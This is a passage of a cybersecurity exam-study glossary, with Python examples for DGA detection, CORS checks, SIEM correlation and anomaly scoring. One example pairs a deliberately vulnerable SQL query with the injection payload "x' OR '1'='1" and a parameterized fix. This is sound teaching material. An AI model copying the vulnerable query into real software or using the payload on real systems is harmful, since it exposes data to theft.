a method used by malware to evade blocklists by generating large numbers of candidate C2 domain names dynamically (the attacker registers only a few of them ahead of time and the malware cycles through the rest until one resolves)
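
DGA domains tend to look random: high character entropy, few vowels, digits mixed into letters. This added example (not from the original page) scores the second-level label of each queried name with those features; the query names and the score thresholds are constructed for illustration, so treat them as a starting point for tuning rather than fixed values.

```python
"""Score DNS query names for DGA-like randomness.

Algorithmically generated labels usually have high character entropy and
few vowels compared with human-chosen names. The thresholds are illustrative
assumptions and the query names are constructed.
"""
import math
from collections import Counter

SAMPLE_QUERIES = [
    "www.example.com",
    "mail.google.com",
    "x7k2p9qv4zl1m8.com",
    "qzjxkvbwnprtyd.net",
    "cdn.cloudflare.com",
]


def shannon_entropy(s):
    """Bits of entropy per character of `s`."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def second_level_label(fqdn):
    """'x7k2p9qv4zl1m8.com' -> 'x7k2p9qv4zl1m8' (ignores public-suffix subtleties like .co.uk)."""
    parts = fqdn.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def dga_score(label):
    """0..4: one point per randomness feature the label exhibits."""
    entropy = shannon_entropy(label)
    vowels = sum(ch in "aeiou" for ch in label)
    vowel_ratio = vowels / max(len(label), 1)
    digits = sum(ch.isdigit() for ch in label)
    score = 0
    score += entropy >= 3.3             # many distinct characters
    score += len(label) >= 12           # long label
    score += vowel_ratio < 0.2          # unpronounceable
    score += 0 < digits < len(label)    # digits mixed with letters
    return score


def flag_dga(queries, min_score=3):
    """Return the query names whose second-level label scores at least `min_score`."""
    return [q for q in queries if dga_score(second_level_label(q)) >= min_score]


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        label = second_level_label(q)
        print(f"{q:24} entropy={shannon_entropy(label):.2f} score={dga_score(label)}")
    print("flagged:", flag_dga(SAMPLE_QUERIES))
```

A per-name score like this is noisy on its own (CDN and tracking hostnames also look random); the stronger signal is many such names from one host that all return NXDOMAIN, which is the malware walking its candidate list until it finds the registered one.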

Fast Flux Network

a method used by malware to hide the presence of C2 networks by continually changing the IP addresses in the domain's DNS records (short-TTL records that point at a rotating pool of compromised hosts); often combined with a DGA, which rotates the domain names themselves

Return on Security Investment (ROSI)

a metric to calculate whether a security control is worth the cost of deploying and maintaining it

Mobile Phone Examiner Plus (MPE+)

a mobile device forensics tool created by AccessData (the developers of FTK)

EnCase Portable (Mobile Device Forensics)

a mobile device forensics tool created by Guidance Software (the developers of EnCase)

Enterprise Mobility Management (EMM)

a mobile device management suite with broader capabilities, such as identity and application management

Yara

a multi-platform program running on Windows, Linux and Mac OS X for identifying, classifying, and describing malware samples (creates Yara rules)

Demilitarized Zone (DMZ)

a physical or logical subnetwork that contains and exposes an organizations external-facing services to an untrusted, usually larger, network such as the Internet

Downloader

a piece of code that connects to the Internet to retrieve additional tools after the initial infection by a dropper (stage 2)

Connectors or Plug-ins (Data Normalization)

a piece of software designed to provide parsing and normalization functions to a particular SIEM

Probing

a preliminary attack that is used to conduct reconnaissance or enumeration against a web service

Virtual Private Cloud (VPC)

a private network segment made available to a single cloud consumer within a public cloud (consumer is responsible for configuring the IP address space and routing within the cloud) (is typically used to provision internet-accessible applications that need to be accessed from geographically remote sites) (considered an IaaS product)

Continuous Delivery (CI/CD)

a software development method where application and platform requirements are frequently tested and validated for immediate availability (must have continuous integration before this) (focuses on automated testing of code in order to get it ready for release)

Port 1900 (UDP port)

UPNP (universal plug and play is used for auto-configuration of port forwarding by gaming consoles and other smart appliances)

Continuous Deployment (CI/CD)

a software development method where application and platform updates are committed to production rapidly (focuses on automated testing and release of code in order to get it into the production environment more quickly) (takes it a step further than continuous delivery by actually releasing the code)

Port 5900 (TCP)

VNC (virtual network computing remote access service where security is implementation dependent and VNC may use other ports) (Unix, Linux, MacOS, Windows)

XML Bomb (Billion Laughs Attack)

XML encodes entities that expand to exponential sizes, consuming memory on the host and potentially crashing it (similar to DoS)

Sinkhole

a DoS attack mitigation strategy that directs the traffic that is flooding a target IP address to a different network for analysis

pstree

a Linux command that provides the parent/child relationship of the processes on a given system

Security Content Automation Protocol (SCAP)

a NIST framework that outlines various accepted practices for automating vulnerability scanning by adhering to standards for scanning processes, results reporting and scoring, and vulnerability prioritization (used to uphold internal and external compliance requirements) - 2 main components: OVAL and XCCDF

Sensors (Data Normalization)

a SIEM can collect packet capture and traffic flow data from sniffers and sensors positioned across the network

ArcSight

a SIEM log management and analytics software that can be used for compliance reporting for legislation and regulations like HIPAA, SOX, and PCI DSS

QRadar

a SIEM log management, analytics, and compliance reporting platform created by IBM

sigcheck

a Sysinternals utility that checks the digital signatures of files and can also verify the root certificates in the local store against Microsoft's master trust list (sigcheck -tv)

Measured Boot

a UEFI feature that gathers secure metrics to validate the boot process in an attestation report

Secure Boot

a UEFI feature that prevents unwanted processes from executing during the boot operation

dd (.dd format)

a Unix/Linux/MacOS command that can perform disk image acquisition (disk duplicator)

certutil

a Windows utility that allows you to display CA configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs, and certificate chains

Windows Firewall

the built-in Windows host firewall, whose log file uses the W3C Extended Log File Format

Daemons

a background service in the Linux operating system; daemon processes are conventionally named with the letter 'd' appended (e.g. httpd, sshd, ftpd)

Mission Essential Function (MEF) *

a business or organizational activity that is too critical to be deferred for anything more than a few hours (if at all)

Playbook

a checklist of actions an analyst performs to detect and respond to a specific type of incident

Attestation

a claim that the data presented in the report is valid by digitally signing it using the TPM's private key

Rootkit

a class of malware that modifies system files (often at the kernel level) to conceal its presence

Security Orchestration, Automation, and Response (SOAR)

a class of security tools that facilitates incident response, threat hunting, and security configuration by orchestrating automated runbooks and delivering data enrichment (SIEM 2.0) (next-gen SIEM, a SIEM with an integrated SOAR) (primarily used for incident response)

unknown unknowns

a classification of malware that contains completely new attack vectors and exploits

known unknowns

a classification of malware that contains obfuscation techniques to circumvent signature-matching and detection

Function as a Service (FAAS)

a cloud service model that supports serverless software architecture by provisioning runtime containers in which code is executed in a particular programming language (essentially it allows us to run things and create applications without having our own servers)

Qualys

a cloud-based vulnerability management solution with installed sensor agents at various points in their network and the sensors upload data to the cloud platform for analysis

DevSecOps

a combination of software development, security operations, and system operations by integrating each discipline with the others (utilizes a shift-left mindset, which means security is developed earlier in the lifecycle)

grep (commands that rely on regex) *

a command on Unix/Linux/macOS systems that invokes simple string matching or regex syntax to search text files for specific strings (use grep to search the contents if analyzing the contents on Linux)

sort (commands that rely on regex)

a command that can be used to change the output order

cut (commands that rely on regex)

a command that extracts selected fields or character positions from each line of its input (e.g. cut -d: -f1 /etc/passwd prints only the usernames)

head (commands that rely on regex)

a command that outputs the first 10 lines of a file specified

tail (commands that rely on regex)

a command that outputs the last 10 lines of a file specified (this command is very useful when dealing with logs)

Reaver (Wireless Assessment Tools)

a command-line tool used to perform brute force attacks against WPS-enabled access points

Nessus

a commercial vulnerability scanner produced by Tenable Network Security for on-premise and cloud-based vulnerability scanning

Enterprise Service Bus (ESB)

a common component of SOA architecture that facilitates decoupled service-to-service communication

SysAdmin, Audit, Network, and Security (SANS) Institute

a company specializing in cybersecurity and secure web application development training; it sponsors the GIAC certifications

Machine Learning (ML)

a component of AI that enables a machine to develop strategies for solving a task given a labeled dataset where features have been manually identified but without further explicit instructions (is only as good as the datasets used to train it) (assists with data correlation)

Full/Deep Assessment Scan

a comprehensive scan that forces the use of more plug-in types, takes longer to conduct host scanning, and has more risk of causing a service disruption

Embedded Systems

a computer system that is designed to perform a specific, dedicated function

Blinding Attack

a condition in which a firewall or IDS is flooded with more traffic than it can log or inspect, so some events are missed; attackers induce it deliberately to hide a follow-on attack

Cross Origin Resource Sharing (CORS) Policy

an HTTP header-based policy (Access-Control-Allow-Origin and related headers) that instructs the browser to treat cross-origin requests from nominated domains as safe and to let scripts from those origins read the response (*WARNING: weak CORS policies, such as a wildcard or reflected origin combined with credentials, expose the site to cross-origin data theft and make XSS-style attacks easier*)
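
The weak configurations named in the warning can be recognised from the response headers alone. This added example (not code from the original page) evaluates a response to a cross-origin request and also shows the server-side logic done right: echo the Origin only when it is on an allow-list. The trusted origins and header sets are constructed.

```python
"""Classify a CORS response as sound or weak, and show the correct server logic.

Findings flagged: wildcard origin together with credentials, the "null"
origin allowed, and an untrusted request Origin reflected back. The trusted
origin list and the sample headers are constructed for this example.
"""
TRUSTED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}


def allow_origin_header(request_origin):
    """Server side done right: echo the Origin only if it is allow-listed, else send no header."""
    return request_origin if request_origin in TRUSTED_ORIGINS else None


def evaluate_cors(request_origin, response_headers):
    """Return a list of findings for a response to a request from `request_origin`."""
    h = {k.lower(): v for k, v in response_headers.items()}
    allow = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    findings = []
    if allow is None:
        return findings                       # no cross-origin read granted at all
    if allow == "*":
        if creds:                             # browsers refuse this combination, but it shows sloppy config
            findings.append("wildcard origin combined with credentials")
    elif allow == "null":
        findings.append("'null' origin allowed: sandboxed iframes and file:// pages can read responses")
    elif allow == request_origin and allow not in TRUSTED_ORIGINS:
        how = "with credentials" if creds else "without credentials"
        findings.append(f"untrusted origin {allow} reflected {how}")
    return findings


# Constructed sample responses to a request carrying Origin: https://evil.example
WEAK_RESPONSE = {
    "Access-Control-Allow-Origin": "https://evil.example",   # origin reflected blindly
    "Access-Control-Allow-Credentials": "true",
}
FIXED_RESPONSE = {
    "Access-Control-Allow-Origin": allow_origin_header("https://evil.example") or "",
}

if __name__ == "__main__":
    print("weak :", evaluate_cors("https://evil.example", WEAK_RESPONSE))
    print("fixed:", evaluate_cors("https://evil.example", {k: v for k, v in FIXED_RESPONSE.items() if v}))
```

The reflected-origin case is the one that matters most: with credentials allowed, a page on the attacker's site can make the victim's browser fetch authenticated data from the target and read it.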

Service Level Agreement (SLA)

a contractual agreement setting out the detailed terms under which an ongoing service is provided

tcpdump

a data-network packet analyzer computer program that runs under a command line interface and allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached

Exception Management

a defined process to closely monitor systems that cannot be patched or remediated and must be excepted from scans

OAuth (Open Authorization)

a delegated authorization framework for RESTful APIs that enables apps to obtain limited access (scopes) to a user's data without giving away a user's password (OAuth2 is explicitly designed to authorize claims and not authenticate users) (must be paired with another tool to perform authentication, typically uses OIDC for authentication) (*OAuth2 is vulnerable to CSRF attacks and open redirects*)

Forensic Watermark

a digital watermark can defeat attempts at removal by cropping pages or images in the file

Self-Encrypting Drives

a disk drive where the controller can automatically encrypt data that is written to it (uses firmware to run the encryption process and all of this is done at the hardware level)

Fuzzing

a dynamic code analysis technique that involves sending a running application random and unusual input to evaluate how the application responds (is a technique designed to test software for bugs and vulnerabilities)

Debugger

a dynamic testing tool used to analyze software as it executes (allows us to pause execution and to monitor/adjust the value of variables at different stages)

Hibernation File (System Memory Image Acquisition)

a file (hiberfil.sys) that is written to disk when the workstation is put into hibernation and contains a compressed copy of RAM (drawback is some malware can detect the use of a hibernation or sleep state and perform anti-forensics)

Prefetch Files *

a file (stored under C:\Windows\Prefetch) that records the name of an application that has been run, as well as the date and time, file path, run count, and DLLs loaded by the executable

pagefile/swap file (System Memory Image Acquisition)

a file that stores pages of memory in use that exceed the capacity of the host's physical RAM modules (is not structured in a way that analysis tools can interpret but can be used to search for strings)

Pretext

a form of social engineering in which an individual lies and provides a false motive to obtain privileged data

Narrative-based Threat Awareness and Intelligence

a form of trend analysis that is reported in long-form prose to describe a common attack vector seen over time

OpenIOC (Indicator Management)

a framework by Mandiant that uses XML-formatted files for supplying codified information to automate incident detection and analysis

Diamond Model of Intrusion Analysis (Attack Framework)

a framework for analyzing cybersecurity incidents and intrusions by exploring the relationships between four core features: adversary, capability, infrastructure, and victim

Domain-Based Message Authentication, Reporting, and Conformance (DMARC)

a framework for ensuring proper application of SPF and DKIM utilizing a policy published as a DNS record (can use either SPF or DKIM or both)

Wireshark

a free and open-source GUI-based packet analyzer that is used for network troubleshooting, analysis, software and communications protocol development, and education

Statistical/Lexicon (DLP Discovery and Classification)

a further refinement of partial document matching is to use machine learning to analyze a range of data sources

Internet Relay Chat (IRC)

a group communication protocol with networks divided into discrete channels that are the individual forums used by clients to chat

Regular Expression (regex)

a group of characters that describe how to execute a specific search pattern on a given text

Internet of Things (IoT)

a group of objects (electronic or not) that are connected to the wider Internet by using embedded electronic components

Jumpbox

a hardened server that provides access to other hosts within the DMZ (allows secure communication from the internal network to hosts within the DMZ) (typically configure VMs as Jumpboxes)

Vulnerability Scanner

a hardware appliance or software application that is configured with a list of known weaknesses and exploits and can scan for their presence in a host operating system or within a particular application

Registry

a hierarchical database that stores low-level settings for the Microsoft Windows operating system and for the kernel, device drivers, services, Security Accounts Manager, and the user interface

Virtualization

a host computer is installed with a hypervisor that can be used to install and manage multiple guest operating systems or VMs

Digital Forensics Kit

a kit containing the software and hardware tools required to acquire and analyze evidence from system memory dumps and mass storage file systems

MITRE ATT&CK Framework (Attack Framework)

a knowledge base maintained by the MITRE Corporation for listing and explaining specific adversary tactics, techniques, and common knowledge or procedures

Due Diligence

a legal principle that a subject has used best practice or reasonable care when setting up, configuring, and maintaining a system

iptables

a Linux host firewall (the user-space front end to the kernel's netfilter framework) whose LOG target writes matched packets to the kernel log, which syslog collects in its standard text format

Access Control Lists (ACL)

a list of IP addresses and ports that are allowed or denied access to the network segment or zone

Script

a list of commands that are executed by a certain program or scripting engine (Bash, PowerShell, Python, Ruby, AWK)

Access Control List (ACLs)

a list of permitted and denied network connections based on either IP addresses, ports, or applications in use

Continuous Integration (CI/CD)

a software development method where code updates are tested and committed to a development or build server/code repository rapidly (can test and commit updates multiple times per day) (detects and resolves development conflicts early and often)

Agile Method

a software development model that focuses on iterative and incremental development to account for evolving requirements and expectations

Waterfall Method

a software development model where the phases of the SDLC cascade so that each phase will start only when all tasks identified in the previous phase are complete (traditional method)

Stress Test

a software testing method that evaluates how software performs under extreme load (is used to determine what could trigger a DoS)

Dereferencing

a software vulnerability that occurs when code attempts to access the object a pointer refers to (dereferences it) while the pointer is null or otherwise invalid, typically crashing the process (null pointer dereference)

Race Conditions

a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer (can be used against databases, file systems, operating system, kernel, or memory)

802.1X

a standard for encapsulating EAP (Extensible Authentication Protocol) communications over a LAN or wireless LAN and that provides port-based authentication

Malware Attribute Enumeration and Characterization (MAEC) Scheme

a standardized language for sharing structured information about malware that is complementary to STIX and TAXII to improve the automated sharing of threat intelligence

SIEM Correlation Rule

a statement that matches certain conditions as expressed using logical expressions, such as AND and OR, and operators, such as == (matches), < (less than), > (greater than), and in (contains)

Normalization (Secure Coding)

a string is stripped of illegal characters or substrings and converted to the accepted character set

Exact Data Match (EDM) (DLP Discovery and Classification)

a structured database of string values to match

Port-based NAC

a switch (or router) that performs some sort of authentication of the attached device before activating the port

Vulnerability Feed

a synchronized list of data and scripts used to check for vulnerabilities, also known as plug-ins or network vulnerability tests (NVTs) (similar to antivirus signatures)

Business Impact Analysis (BIA)

a systematic activity that identifies organizational risks and determines their effect on ongoing, mission critical operations

cron

a task scheduler in Linux that runs commands at the times defined in crontab entries (an @reboot entry runs a job once at startup; attackers frequently abuse cron entries for persistence)

Parameterized Queries

a technique that defends against SQL injection by incorporating placeholders in a SQL query so that the statement structure is fixed and user input is bound as data rather than spliced into the statement text (it is not a form of output encoding, and it does not replace the authorization checks needed against insecure direct object references)
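The same lookup written both ways, so the difference is visible in the result set rather than in theory. This is an added example, not code from the original deck; the in-memory SQLite table and its rows are constructed for illustration.

```python
import sqlite3

def setup_db() -> sqlite3.Connection:
    """In-memory demo database with constructed rows (not real accounts)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "analyst"), ("bob", "admin")])
    return conn

def lookup_vulnerable(conn, username: str) -> list:
    # BAD: untrusted input is spliced into the statement text, so the input
    # can change the query's structure (here: append OR '1'='1)
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterized(conn, username: str) -> list:
    # GOOD: the statement shape is fixed when it is prepared; the driver binds
    # the value as data, so quotes and keywords inside it are never parsed as SQL
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]

ALLOWED_SORT_COLUMNS = {"username", "role"}

def list_users_sorted(conn, column: str) -> list:
    # Placeholders can only bind values, never identifiers (table or column
    # names, ORDER BY targets), so those must be checked against an allow-list
    if column not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unknown sort column")
    return [row[0] for row in conn.execute(f"SELECT username FROM users ORDER BY {column}")]

INJECTION = "x' OR '1'='1"   # classic tautology payload

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:    ", lookup_vulnerable(db, INJECTION))   # every user
    print("parameterized: ", lookup_parameterized(db, INJECTION))  # nothing
```

The allow-list in `list_users_sorted` is the caveat practitioners trip over: parameterization covers the value positions of a statement, so anything that must vary structurally still needs explicit validation.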

Address Space Layout Randomization (ASLR)

a technique that randomizes where components of a running application (stack, heap, shared libraries, executable image) are placed in memory so that an attacker cannot predict the addresses a buffer overflow exploit relies on

Fast Flux DNS

a technique that rapidly changes the IP addresses associated with a domain (can be detected by looking at communication patterns in the proxy logs)

nmap -f or --mtu (Fragmentation)

a technique that splits the TCP header of each probe between multiple IP datagrams to make it harder for an IDS or IPS to detect

Policy Template (DLP Discovery and Classification)

a template contains dictionaries optimized for data points in a regulatory or legislative schema (specialized dictionary)

Buffer

a temporary storage area that a program uses to store data

JSON Web Tokens (JWT)

a token format made of three base64url-encoded segments, a header, a payload, and a signature, where the header and payload are JavaScript Object Notation (JSON) messages (commonly used as OAuth access tokens and OIDC ID tokens for authorization; the verifier must check the signature, the expected algorithm, and the expiry claim)

regdump

a tool that dumps the contents of the registry in a text file with simple formatting so that you can search specific strings in the file using the 'find' command

curl

a tool to transfer data from or to a server using one of the supported protocols (HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, DICT, TELNET, LDAP, FILE) (used to test APIs)

Multi Router Traffic Grapher (MRTG)

a tool used to create graphs showing traffic flows through the network interfaces of routers and switches by polling the appliances using the Simple Network Management Protocol (SNMP)

HIDS/HIPS (endpoint protection tool)

a type of IDS/IPS that monitors a computer system for unexpected behavior or drastic changes to the system's state on an endpoint

Real-Time Operating System (RTOS)

a type of OS that prioritizes deterministic execution of operations to ensure consistent response for time-critical tasks

Programmable Logic Controller (PLC) (Embedded System)

a type of computer designed for deployment in an industrial or outdoor setting that can automate and monitor mechanical systems (runs on firmware which can be patched and reprogrammed to fix vulnerabilities)

System Isolation (Air Gap)

a type of network isolation that physically separates a network from all other networks

Session Hijacking

a type of spoofing attack where the attacker disconnects a host then replaces it with his or her own machine, spoofing the original host's IP address (can occur through the theft or modification of cookies)

Unified Extensible Firmware Interface (UEFI)

a type of system firmware providing support for 64-bit CPU operation at boot, full GUI and mouse operation at boot, and better boot security (Secure Boot, Measured Boot)

Containerization

a type of virtualization applied by a host operating system to provision an isolated execution environment for an application

Process Identification (PID)

a unique identification number assigned by the operating system (such as Linux) to each process it launches

parent process ID (PPID)

the process identification number of the parent that launched a given process; every process on a Linux system has one, which lets an analyst rebuild the process tree

Nmap Security Scanner

a versatile port scanner used for topology, host, service, and OS discovery and enumeration

Virtual Desktop Infrastructure (VDI) *

a virtualization implementation that separates the personal computing environment from a user's physical computer (disadvantage is that users have no local processing ability if the server or network is down)

Web Application Scanner

a vulnerability testing tool designed to identify issues with web servers and web applications (used to detect XSS, SQL injection, and other types of web attacks)

Remote Code Execution

a vulnerability that allows an attacker to transmit code from a remote host for execution on a target host or a module that exploits such a vulnerability

File Inclusion

a web application vulnerability that allows an attacker either to read a file from an arbitrary location on the host file system (local file inclusion, usually achieved through directory traversal) or to include or upload an executable or script file to open a backdoor (remote file inclusion pulls that file from an attacker-controlled server)

reference (rule options)

matches a rule to an entry in an external attack database so the alert carries a lookup key (ex. a CVE ID, or a MITRE ATT&CK technique ID such as T1110 for brute force, so the analyst can pivot straight to the reference)

Discretionary Access Control (DAC)

access control model where each resource is protected by an ACL managed by the resource's owner (e.g., Windows NTFS permissions)

Role-based Access Control (RBAC)

access control model where resources are protected by ACLs that are managed by administrators and that provide user permissions based on job functions

Mandatory Access Control (MAC)

access control model where resources are protected by inflexible, system-defined rules in which each resource (object) and each user (subject) is allocated a clearance level (label), and access is granted only when the labels permit it

Attribute-Based Access Control (ABAC)

access control technique that evaluates a set of attributes that each subject possesses to determine if access should be granted (can be used to implement controls for separation of duties)

Persistent Data Acquisition (Virtualization Forensics)

acquiring data from persistent devices, such as virtual hard drives and other virtualized mass storage devices to an image-based format

Taxonomy-based Approach (Impact Analysis)

an approach that defines incident categories at the top level, such as worm outbreak, phishing attempt, DDoS, external host/account compromise, or internal privilege abuse

Artificial Neural Networks (ANNs)

an architecture of input, hidden, and output layers that can perform algorithmic analysis of a dataset to achieve outcome objectives (a machine learning system adjusts its neural network to reduce errors and optimize objectives)

Integer Overflow

an attack in which a computed result is too large to fit in its assigned storage space, which may lead to crashing or data corruption, and may trigger a buffer overflow

Buffer Overflow

an attack in which data goes past the boundary of the destination buffer and begins to corrupt adjacent memory

XML External Entity (XXE)

an attack that embeds a request for a local or remote resource in an XML external entity declaration so that the parser reads the file or fetches the URL on the attacker's behalf (similar to file inclusion, and a common route to server-side request forgery)

Coercive Parsing

an attack that modifies requests to a SOAP web service in order to cause the service to parse the XML-based requests in a harmful way (can cause an exploit to run or a DoS)

DDoS (Traffic Spikes)

an attack that uses multiple compromised hosts (a botnet) to overwhelm a service with request or response traffic

Prowler

an auditing tool for AWS that is used to evaluate the cloud infrastructure against AWS benchmarks, GDPR compliance, and HIPAA compliance

OpenID Connect (OIDC)

an authentication protocol that can be implemented as special types of OAuth flows with precisely defined token fields (*OAuth is for authorization and OpenID Connect is used for authentication*)

Runbook

an automated version of a playbook that leaves clearly defined interaction points for human analysis

Spear Phishing

an email spoofing attack targeting a specific organization or individual by seeking unauthorized access to sensitive information

Passive Scan (Vulnerability Scanner Types)

an enumeration or vulnerability scan that analyzes only intercepted network traffic rather than sending probes to a target (commonly used for threat hunting)

Report Writing (post-incident activities)

an essential analyst skill that is used to communicate information about the incident to a wide variety of stakeholders (ex. executive summary)

SQL Event Logs

an event/error log that records events with fields like date, time, and the action taken, such as server startup, individual database startup, database cache clearing, and databases not starting or shutting down unexpectedly

Business Email Compromise (BEC)

an impersonation attack in which the attacker gains control of an employee's account and uses it to convince other employees to perform fraudulent actions

Command and Control (C2)

an infrastructure of hosts and services with which attackers direct, distribute, and control malware over botnets

Python and Ruby (scripting tools)

interpreted, high-level, general-purpose programming languages used heavily by cybersecurity analysts and penetration testers

Zeek (IDS/IPS Configuration tool)

an open-source IDS for UNIX/Linux platforms that contains a scripting engine which can be used to act on significant events (notices) by generating an alert or implementing some sort of shunning mechanism

Security Onion (IDS/IPS Configuration tool)

an open-source Linux-based platform (SIEM) for security monitoring, incident response, and threat hunting and it bundles together a lot of different tools like Snort, Suricata, Zeek, Wireshark and NetworkMiner with log management and incident management tools

Graylog

an open-source SIEM with an enterprise version focused on compliance and supporting IT operations and DevOps

Pacu

an open-source cloud penetration testing framework to test the security configuration of an AWS account

Scalpel

an open-source command line file carving tool (a fork of Foremost) that is commonly installed alongside The Sleuth Kit and used to recover files from disk images on Linux and Windows systems

The Sleuth Kit *

an open-source digital forensics collection of command line tools and programming libraries for disk imaging and file analysis that interfaces with Autopsy as a graphical user-front end interface (* free open source solution)

OWASP Zed Attack Proxy (ZAP)

an open-source interception proxy and web application vulnerability assessment tool written in Java (includes crawlers to automate the discovery of links and content within a web application)

The Volatility Framework

an open-source memory forensics tool that has many different modules for analyzing specific elements of memory such as a web browser module, command prompt history module, and others

Snort (IDS/IPS Configuration tool)

an open-source IDS/IPS available for Windows and selected Linux distributions that can operate in either IDS (alert) or IPS (inline block) mode

ScoutSuite

an open-source tool written in Python that can be used to audit instances and policies created on multicloud platforms, including AWS, Azure, and Google Cloud Platform

DevOps

an organizational culture shift that combines software development and systems operations by referring to the practice of integrating the two disciplines within a company (operations and developers can build, test, and release software faster and more reliably)

Rogue Devices

an unauthorized device or service, such as a wireless access point, DHCP server, or DNS server, on a corporate or private network that allows unauthorized individuals to connect to the network

Post-Incident Activity (Incident Response Phases)

analyze the incident and responses to identify whether procedures or systems could be improved

nmap -sI (TCP Idle Scan)

another stealth method, this scan makes it appear that another machine (a zombie) started the scan to hide the true identity of the scanning machine

Response Code 500-599 (URL Analysis)

any code in this range indicates a server-side issue

Response Code 400-499 (URL Analysis)

any code in this range indicates an error in the client request

Response Code 300-399 (URL Analysis)

any code in this range indicates that a redirect has occurred by the server

What information should be recorded on a chain of custody form during a forensic investigation?

every individual who handled the evidence, together with the date, time, and purpose of each handoff

Shellcode

any lightweight code designed to run an exploit on the target, which may include any type of code format from scripting languages to binary code

Snowflake Systems

any system that is different in its configuration compared to a standard template within an infrastructure as code (IaC) architecture (lack of consistency leads to security issues and inefficiencies in support)

track (rule options)

applies a rate limiter to the rule so it triggers only when the count of matching events passes a threshold within a set duration (ex. flag a source that fails once every minute but ignore one that fails once an hour) (in Snort this is the threshold or detection_filter option, with track by_src or by_dst, count, and seconds)
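The SIEM correlation rule card (conditions joined with AND/OR using ==, <, > and in) and the track card above both describe parts of one evaluator, so one added example covers both. It is not code from the original deck: the rule, field names, and Windows-style logon events are constructed for illustration.

```python
import operator
from collections import defaultdict

# Operators from the correlation-rule card: == (matches), <, >, in (contains)
OPS = {
    "==": operator.eq,
    "<": operator.lt,
    ">": operator.gt,
    "in": lambda field_value, needle: needle in field_value,
}

# Hypothetical rule (names are this example's own): five or more failed
# network logons from a single source address inside a 60-second window
RULE = {
    "name": "brute-force-logon",
    "where": ("AND", [
        ("event_id", "==", 4625),
        ("message", "in", "failed to log on"),
        ("logon_type", ">", 2),          # exclude type 2 (interactive at the console)
    ]),
    "threshold": {"track": "src_ip", "count": 5, "seconds": 60},
}

def event(ts, event_id, src_ip, logon_type, message):
    return {"ts": ts, "event_id": event_id, "src_ip": src_ip,
            "logon_type": logon_type, "message": message}

FAIL, OK = "An account failed to log on", "An account was successfully logged on"
# Constructed events (not real logs): a burst from 10.0.0.5, slow failures from 10.0.0.9
EVENTS = (
    [event(1000 + 5 * i, 4625, "10.0.0.5", 3, FAIL) for i in range(6)]
    + [event(1003, 4625, "10.0.0.5", 2, FAIL)]                  # console failure, excluded
    + [event(1030, 4624, "10.0.0.5", 3, OK)]                    # success, not matched
    + [event(t, 4625, "10.0.0.9", 3, FAIL) for t in (1000, 1100, 1200)]
)

def matches(where, ev) -> bool:
    """Evaluate the rule's conditions against one event."""
    joiner, conditions = where
    results = [field in ev and OPS[op](ev[field], value) for field, op, value in conditions]
    return all(results) if joiner == "AND" else any(results)

def correlate(rule, events) -> list:
    """Emit an alert per tracked key whenever `count` matches fall within `seconds`."""
    thr = rule["threshold"]
    recent = defaultdict(list)     # tracked key -> timestamps of matching events
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if not matches(rule["where"], ev):
            continue
        key = ev[thr["track"]]
        # slide the window: keep only timestamps still inside `seconds`
        recent[key] = [t for t in recent[key] if ev["ts"] - t < thr["seconds"]] + [ev["ts"]]
        if len(recent[key]) >= thr["count"]:
            alerts.append({"rule": rule["name"], thr["track"]: key,
                           "ts": ev["ts"], "count": len(recent[key])})
            recent[key] = []       # reset so one burst yields one alert
    return alerts

if __name__ == "__main__":
    for alert in correlate(RULE, EVENTS):
        print(alert)
```

Without the tracking threshold this rule would alert on every single failed logon; with it, the three slow failures from 10.0.0.9 never cross the threshold and only the 10.0.0.5 burst produces an alert, which is the noise reduction the card is describing.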

MAC filtering

applying an ACL to a switch or access point so that only clients with approved MAC addresses can connect to it

VM Introspection (VMI)

uses tools installed on the hypervisor to retrieve pages of a guest VM's memory for analysis without running anything inside the guest

statistical deviation analysis

uses the concept of mean and standard deviations to determine if a data point should be treated as suspicious
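The mean-and-standard-deviation test in runnable form, scoring new observations against a clean baseline. This is an added example, not code from the original deck; the hourly failed-logon counts are constructed for illustration.

```python
import statistics

# Constructed sample (not real data): failed logons per hour for one account.
# The baseline is a period believed to be clean; new hours are scored against it.
BASELINE = [3, 4, 2, 5, 3, 4, 6, 3, 2, 4, 3, 5, 4, 3, 2, 4, 3, 5, 4, 3, 6, 2, 3, 4]
NEW_HOURS = {"09:00": 5, "10:00": 48, "11:00": 4}

def baseline_stats(values):
    """Mean and population standard deviation of the clean baseline."""
    return statistics.fmean(values), statistics.pstdev(values)

def zscore(value, mean, stdev):
    """How many standard deviations `value` sits from the mean."""
    if stdev == 0:                      # flat baseline: any change at all is a deviation
        return 0.0 if value == mean else float("inf")
    return (value - mean) / stdev

def flag_anomalies(observations, baseline, threshold=3.0):
    """Return {label: z} for observations more than `threshold` deviations out."""
    mean, stdev = baseline_stats(baseline)
    flagged = {}
    for label, value in observations.items():
        z = zscore(value, mean, stdev)
        if abs(z) > threshold:
            flagged[label] = round(z, 2)
    return flagged

if __name__ == "__main__":
    print(flag_anomalies(NEW_HOURS, BASELINE))
    # Caveat: if the outlier leaks into the baseline it inflates the deviation,
    # so later spikes of the same size score far lower (masking)
    print(baseline_stats(BASELINE)[1], baseline_stats(BASELINE + [48])[1])
```

The second print line is the practitioner's caveat: the standard deviation of the clean baseline is about 1.1, but appending a single 48 pushes it to nearly 9, so a baseline window must be curated (or robust statistics such as the median absolute deviation used) or attackers who ramp up slowly will train the detector to ignore them.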

Deceive

